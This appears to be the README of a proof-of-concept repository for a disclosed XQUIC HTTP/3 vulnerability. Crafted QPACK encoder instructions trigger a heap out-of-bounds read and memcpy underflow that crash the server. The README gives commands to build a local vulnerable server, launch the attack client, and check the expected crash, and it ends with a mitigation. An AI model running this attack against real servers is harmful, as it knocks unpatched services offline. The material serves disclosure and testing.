This is the supporting code of the blog post available at https://foxio.io/blog/xring-crashing-xquic-with-spec-compliant-qpack-instructions
A remote, unauthenticated client can crash an XQUIC HTTP/3 server with spec-compliant encoder stream instructions. The bug is in xqc_ring_mem_resize (xqc_ring_mem.c): the both-truncated resize branch sizes an old-buffer tail using the new table capacity instead of the old one, causing a 64-byte heap out-of-bounds read followed by a size_t underflow into memcpy.
All versions through v1.9.4 (latest at time of publication) are affected.
./run.sh build # build the XQUIC v1.9.4 server image
./run.sh start # start it on udp/8443
./run.sh attack # send the payload, report server state
Expected:
server: CRASHED (exit=133 oom=false)
cause: glibc _FORTIFY_SOURCE aborted the underflowed memcpy (SIGTRAP)
logs:
*** buffer overflow detected ***: terminated
./run.sh asan
cd remote-client && go run . -target 127.0.0.1:8444
docker logs xring_xquic_asan
Advertise SETTINGS_QPACK_MAX_TABLE_CAPACITY = 0 to disable the dynamic table.